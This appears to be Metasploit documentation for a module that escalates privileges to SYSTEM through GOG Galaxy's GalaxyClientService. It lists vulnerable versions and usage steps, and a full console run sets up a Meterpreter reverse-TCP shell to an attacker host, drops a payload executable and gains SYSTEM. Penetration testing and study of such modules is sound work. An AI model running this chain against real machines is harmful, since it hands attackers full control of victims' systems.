## Vulnerable Application

GOG Galaxy is a video game management client. One of its Windows services, *GalaxyClientService*, runs with *SYSTEM* privileges.
In versions 2.0.12 and earlier, and 1.2.64 and earlier, it is possible to communicate with the service and instruct it to
execute arbitrary commands as *SYSTEM*.

A vulnerable [version](https://www.gog.com/galaxy) need only be installed on the target machine in order to be exploitable.

## Verification Steps

  1. Start *msfconsole*.
  2. Acquire a Meterpreter session.
  3. Do: ```use exploit/windows/local/gog_galaxyclientservice_privesc```
  4. Do: ```set SESSION <session_no>```
  5. Do: ```exploit```
  6. Verify that you get a Meterpreter session.

## Options
### WORKING_DIR

The initial working directory of the command.

## Scenarios
### GOG Galaxy Client `v1.2.66.64` on Windows 10

```
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.131:50855) at 2020-06-15 08:35:15 -0500

meterpreter > getuid
Server username: DESKTOP-AQT4EG1\space
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/gog_galaxyclientservice_privesc
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set session 1
session => 1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > check
[*] The target appears to be vulnerable. Vulnerable version found: 1.2.66.64
msf5 exploit(windows/local/gog_galaxyclientservice_privesc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Starting GalaxyClientService...
[*] Service started successfully.
[*] Connecting to service...
[*] Writing C:\Users\space\AppData\Local\Temp\mqslPXvWyu.exe to target
[*] Connected to service.  Sending payload...
[*] Sending stage (201283 bytes) to 192.168.37.131
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.131:50857) at 2020-06-15 08:35:59 -0500
[+] Command executed successfully!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-AQT4EG1
OS              : Windows 10 (10.0 Build 18362).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 15
Meterpreter     : x64/windows
```
